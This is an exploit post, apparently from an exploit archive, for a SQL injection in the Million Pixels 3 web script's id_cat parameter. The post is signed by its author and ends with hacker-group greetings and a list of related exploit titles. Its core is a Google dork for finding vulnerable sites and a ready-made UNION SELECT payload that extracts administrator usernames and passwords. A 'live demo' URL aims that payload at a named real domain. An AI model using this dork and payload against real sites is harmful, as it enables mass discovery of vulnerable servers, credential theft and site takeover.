#################################################################

#

# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

#

#========================================================

# =

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

# =

#========================================================

#

# script : http://e-topbiz.com/oprema/pages/millionpixels3.php

#

# DorK : inurl: "tops_top.php? id_cat ="

#################################################################

Exploit:

www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

L!VE DEMO:

http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability】相关文章：

★ Joomla Component EZ Store Remote Blind SQL Injection Exploit

★ Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

★ Dreampics Builder (page) Remote SQL Injection Vulnerability

★ MFORUM 0.1a Arbitrary Add-Admin Vulnerability

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

★ minb 0.1.0 Remote Code Execution Exploit

★ Maian Music 1.0 Insecure Cookie Handling Vulnerability

★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

★ Maian Greetings 2.1 Insecure Cookie Handling Vulnerability